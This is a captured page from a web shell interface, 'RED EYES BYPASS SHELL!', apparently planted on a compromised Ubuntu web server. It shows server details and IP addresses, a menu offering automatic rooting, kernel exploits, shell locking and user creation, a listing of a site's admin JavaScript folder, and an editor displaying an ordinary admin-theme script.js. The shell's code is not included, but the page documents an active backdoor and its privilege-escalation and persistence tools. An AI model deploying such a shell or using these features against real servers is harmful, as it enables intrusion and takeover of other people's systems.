Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
rdiresearch /
admin /
assets /
assets /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
menu
[ DIR ]
drwxr-xr-x
SmoothScroll.js
19.96
KB
-rwxr-xr-x
animation.js
640
B
-rwxr-xr-x
bootstrap-growl.min.js
5.57
KB
-rwxr-xr-x
classie.js
1.79
KB
-rwxr-xr-x
color-json-common-page.js
0
B
-rwxr-xr-x
common-pages.js
296
B
-rwxr-xr-x
counter.js
2.18
KB
-rwxr-xr-x
demo-box.js
13.51
KB
-rwxr-xr-x
demo-dark-light.js
13.51
KB
-rwxr-xr-x
demo-dark.js
13.51
KB
-rwxr-xr-x
demo-image.js
14.64
KB
-rwxr-xr-x
demo-light-dark.js
13.51
KB
-rwxr-xr-x
horizontal-layout.js
11.25
KB
-rwxr-xr-x
horizontal-layout.min.js
6.5
KB
-rwxr-xr-x
jquery.easypiechart.min.js
3.9
KB
-rwxr-xr-x
jquery.mCustomScrollbar.concat.min.js
44.41
KB
-rwxr-xr-x
jquery.mousewheel.min.js
2.71
KB
-rwxr-xr-x
jquery.quicksearch.js
4.6
KB
-rwxr-xr-x
modal.js
2.75
KB
-rwxr-xr-x
modalEffects.js
1.33
KB
-rwxr-xr-x
owl-custom.js
209
B
-rwxr-xr-x
pcoded.min.js
51
KB
-rwxr-xr-x
rating.js
3.61
KB
-rwxr-xr-x
script.js
17.59
KB
-rwxr-xr-x
script.min.js
11
KB
-rwxr-xr-x
sweetalert.js
16.58
KB
-rwxr-xr-x
swiper-custom.js
705
B
-rwxr-xr-x
vartical-layout.js
13.51
KB
-rwxr-xr-x
vartical-layout.min.js
5.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
"use strict"; $(document).ready(function() { var $window = $(window); //add id to main menu for mobile menu start var getBody = $("body"); var bodyClass = getBody[0].className; $(".main-menu").attr('id', bodyClass); //add id to main menu for mobile menu end // card js start $(".card-header-right .close-card").on('click', function() { var $this = $(this); $this.parents('.card').animate({ 'opacity': '0', '-webkit-transform': 'scale3d(.3, .3, .3)', 'transform': 'scale3d(.3, .3, .3)' }); setTimeout(function() { $this.parents('.card').remove(); }, 800); }); $(".card-header-right .minimize-card").on('click', function() { var $this = $(this); var port = $($this.parents('.card')); var card = $(port).children('.card-block').slideToggle(); $(this).toggleClass("icon-minus").fadeIn('slow'); $(this).toggleClass("icon-plus").fadeIn('slow'); }); $(".card-header-right .full-card").on('click', function() { var $this = $(this); var port = $($this.parents('.card')); port.toggleClass("full-card"); $(this).toggleClass("icon-maximize"); $(this).toggleClass("icon-minimize"); }); $("#more-details").on('click', function() { $(".more-details").slideToggle(500); }); $(".mobile-options").on('click', function() { $(".navbar-container .nav-right").slideToggle('slow'); }); // card js end $.mCustomScrollbar.defaults.axis = "yx"; $("#styleSelector .style-cont").slimScroll({ setTop: "10px", height:"calc(100vh - 440px)", }); $(".main-menu").mCustomScrollbar({ setTop: "10px", setHeight: "calc(100% - 80px)", }); /*chatbar js start*/ /*chat box scroll*/ var a = $(window).height() - 80; $(".main-friend-list").slimScroll({ height: a, allowPageScroll: false, wheelStep: 5, color: '#1b8bf9' }); // search $("#search-friends").on("keyup", function() { var g = $(this).val().toLowerCase(); $(".userlist-box .media-body .chat-header").each(function() { var s = $(this).text().toLowerCase(); $(this).closest('.userlist-box')[s.indexOf(g) !== -1 ? 'show' : 'hide'](); }); }); // open chat box $('.displayChatbox').on('click', function() { var my_val = $('.pcoded').attr('vertical-placement'); if (my_val == 'right') { var options = { direction: 'left' }; } else { var options = { direction: 'right' }; } $('.showChat').toggle('slide', options, 500); }); //open friend chat $('.userlist-box').on('click', function() { var my_val = $('.pcoded').attr('vertical-placement'); if (my_val == 'right') { var options = { direction: 'left' }; } else { var options = { direction: 'right' }; } $('.showChat_inner').toggle('slide', options, 500); }); //back to main chatbar $('.back_chatBox').on('click', function() { var my_val = $('.pcoded').attr('vertical-placement'); if (my_val == 'right') { var options = { direction: 'left' }; } else { var options = { direction: 'right' }; } $('.showChat_inner').toggle('slide', options, 500); $('.showChat').css('display', 'block'); }); // /*chatbar js end*/ $(".search-btn").on('click', function() { $(".main-search").addClass('open'); $('.main-search .form-control').animate({ 'width': '200px', }); }); $(".search-close").on('click', function() { $('.main-search .form-control').animate({ 'width': '0', }); setTimeout(function() { $(".main-search").removeClass('open'); }, 300); }); $('#mobile-collapse i').addClass('icon-toggle-right'); $('#mobile-collapse').on('click', function() { $('#mobile-collapse i').toggleClass('icon-toggle-right'); $('#mobile-collapse i').toggleClass('icon-toggle-left'); }); }); $(document).ready(function() { $(function() { $('[data-toggle="tooltip"]').tooltip() }) $('.theme-loader').fadeOut('slow', function() { $(this).remove(); }); }); // toggle full screen function toggleFullScreen() { var a = $(window).height() - 10; if (!document.fullscreenElement && // alternative standard method !document.mozFullScreenElement && !document.webkitFullscreenElement) { // current working methods if (document.documentElement.requestFullscreen) { document.documentElement.requestFullscreen(); } else if (document.documentElement.mozRequestFullScreen) { document.documentElement.mozRequestFullScreen(); } else if (document.documentElement.webkitRequestFullscreen) { document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT); } } else { if (document.cancelFullScreen) { document.cancelFullScreen(); } else if (document.mozCancelFullScreen) { document.mozCancelFullScreen(); } else if (document.webkitCancelFullScreen) { document.webkitCancelFullScreen(); } } $('.full-screen').toggleClass('icon-maximize'); $('.full-screen').toggleClass('icon-minimize'); } /* -------------------------------------------------------- Color picker - demo only -------------------------------------------------------- */ $('#styleSelector').append('' + '<div class="selector-toggle">' + '<a href="javascript:void(0)"></a>' + '</div>' + '<ul>' + '<li>' + '<p class="selector-title main-title st-main-title"><b>Adminty </b>Customizer</p>' + '<span class="text-muted">Live customizer with tons of options</span>'+ '</li>' + '<li>' + '<p class="selector-title">Main layouts</p>' + '</li>' + '<li>' + '<div class="theme-color">' + '<a href="#" class="navbar-theme" navbar-theme="themelight1"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="navbar-theme" navbar-theme="theme1"><span class="head"></span><span class="cont"></span></a>' + '</div>' + '</li>' + '</ul>' + '<div class="style-cont m-t-10">' + '<ul class="nav nav-tabs tabs" role="tablist">' + '<li class="nav-item"><a class="nav-link active" data-bs-toggle="tab" href="#sel-layout" role="tab">Layouts</a></li>' + '<li class="nav-item"><a class="nav-link" data-bs-toggle="tab" href="#sel-sidebar-setting" role="tab">Sidebar Settings</a></li>' + '</ul>' + '<div class="tab-content tabs">' + '<div class="tab-pane active" id="sel-layout" role="tabpanel">' + '<ul>' + '<li class="theme-option">' + '<div class="checkbox-fade fade-in-primary">' + '<label>' + '<input type="checkbox" value="false" id="sidebar-position" name="sidebar-position" checked>' + '<span class="cr"><i class="cr-icon feather icon-check txt-success f-w-600"></i></span>' + '<span>Fixed Sidebar Position</span>' + '</label>' + '</div>' + '</li>' + '<li class="theme-option">' + '<div class="checkbox-fade fade-in-primary">' + '<label>' + '<input type="checkbox" value="false" id="header-position" name="header-position" checked>' + '<span class="cr"><i class="cr-icon feather icon-check txt-success f-w-600"></i></span>' + '<span>Fixed Header Position</span>' + '</label>' + '</div>' + '</li>' + '</ul>' + '</div>' + '<div class="tab-pane" id="sel-sidebar-setting" role="tabpanel">' + '<ul>' + '<li class="theme-option">' + '<p class="sub-title drp-title">Menu Type</p>' + '<div class="form-radio" id="menu-effect">'+ '<div class="radio radio-inverse radio-inline" data-toggle="tooltip" title="simple icon">'+ '<label>'+ '<input type="radio" name="radio" value="st6" onclick="handlemenutype(this.value)" checked="true">'+ '<i class="helper"></i><span class="micon st6"><i class="feather icon-command"></i></span>'+ '</label>'+ '</div>'+ '<div class="radio radio-primary radio-inline" data-toggle="tooltip" title="color icon">'+ '<label>'+ '<input type="radio" name="radio" value="st5" onclick="handlemenutype(this.value)">'+ '<i class="helper"></i><span class="micon st5"><i class="feather icon-command"></i></span>'+ '</label>'+ '</div>'+ '</div>'+ '</li>' + '<li class="theme-option">' + '<p class="sub-title drp-title">SideBar Effect</p>' + '<select id="vertical-menu-effect" class="form-control minimal">' + '<option name="vertical-menu-effect" value="shrink">shrink</option>' + '<option name="vertical-menu-effect" value="overlay">overlay</option>' + '<option name="vertical-menu-effect" value="push">Push</option>' + '</select>' + '</li>' + '<li class="theme-option">' + '<p class="sub-title drp-title">Hide/Show Border</p>' + '<select id="vertical-border-style" class="form-control minimal">' + '<option name="vertical-border-style" value="solid">Style 1</option>' + '<option name="vertical-border-style" value="dotted">Style 2</option>' + '<option name="vertical-border-style" value="dashed">Style 3</option>' + '<option name="vertical-border-style" value="none">No Border</option>' + '</select>' + '</li>' + '<li class="theme-option">' + '<p class="sub-title drp-title">Drop-Down Icon</p>' + '<select id="vertical-dropdown-icon" class="form-control minimal">' + '<option name="vertical-dropdown-icon" value="style1">Style 1</option>' + '<option name="vertical-dropdown-icon" value="style2">style 2</option>' + '<option name="vertical-dropdown-icon" value="style3">style 3</option>' + '</select>' + '</li>' + '<li class="theme-option">' + '<p class="sub-title drp-title">Sub Menu Drop-down Icon</p>' + '<select id="vertical-subitem-icon" class="form-control minimal">' + '<option name="vertical-subitem-icon" value="style1">Style 1</option>' + '<option name="vertical-subitem-icon" value="style2">style 2</option>' + '<option name="vertical-subitem-icon" value="style3">style 3</option>' + '<option name="vertical-subitem-icon" value="style4">style 4</option>' + '<option name="vertical-subitem-icon" value="style5">style 5</option>' + '<option name="vertical-subitem-icon" value="style6">style 6</option>' + '</select>' + '</li>' + '</ul>' + '</div>' + '<ul>' + '<li>' + '<p class="selector-title">Header Brand color</p>' + '</li>' + '<li class="theme-option">' + '<div class="theme-color">' + '<a href="#" class="logo-theme" logo-theme="theme1"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="logo-theme" logo-theme="theme2"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="logo-theme" logo-theme="theme3"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="logo-theme" logo-theme="theme4"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="logo-theme" logo-theme="theme5"><span class="head"></span><span class="cont"></span></a>' + '</div>' + '</li>' + '<li>' + '<p class="selector-title">Header color</p>' + '</li>' + '<li class="theme-option">' + '<div class="theme-color">' + '<a href="#" class="header-theme" header-theme="theme1"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="header-theme" header-theme="theme2"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="header-theme" header-theme="theme3"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="header-theme" header-theme="theme4"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="header-theme" header-theme="theme5"><span class="head"></span><span class="cont"></span></a>' + '<a href="#" class="header-theme" header-theme="theme6"><span class="head"></span><span class="cont"></span></a>' + '</div>' + '</li>' + '<li>' + '<p class="selector-title">Active link color</p>' + '</li>' + '<li class="theme-option">' + '<div class="theme-color">' + '<a href="#" class="active-item-theme small" active-item-theme="theme1"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme2"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme3"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme4"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme5"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme6"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme7"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme8"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme9"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme10"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme11"> </a>' + '<a href="#" class="active-item-theme small" active-item-theme="theme12"> </a>' + '</div>' + '</li>' + '<li>' + '<p class="selector-title">Menu Caption Color</p>' + '</li>' + '<li class="theme-option">' + '<div class="theme-color">' + '<a href="#" class="leftheader-theme small" lheader-theme="theme1"> </a>' + '<a href="#" class="leftheader-theme small" lheader-theme="theme2"> </a>' + '<a href="#" class="leftheader-theme small" lheader-theme="theme3"> </a>' + '<a href="#" class="leftheader-theme small" lheader-theme="theme4"> </a>' + '<a href="#" class="leftheader-theme small" lheader-theme="theme5"> </a>' + '<a href="#" class="leftheader-theme small" lheader-theme="theme6"> </a>' + '</div>' + '</li>' + '</ul>' + '</div>' + '</div>' + '<ul>'+ '<li>' + '<a href="http://html.codedthemes.com/Adminty/doc" target="_blank" class="btn btn-primary btn-block m-r-15 m-t-5 m-b-10">Online Documentation</a>' + '</li>' + '<li class="text-center">' + '<span class="text-center f-18 m-t-15 m-b-15 d-block">Thank you for sharing !</span>' + '<a href="#!" target="_blank" class="btn btn-facebook soc-icon m-b-20"><i class="feather icon-facebook"></i></a>' + '<a href="#!" target="_blank" class="btn btn-twitter soc-icon m-l-20 m-b-20"><i class="feather icon-twitter"></i></a>' + '</li>' + '</ul>'+ '');
Close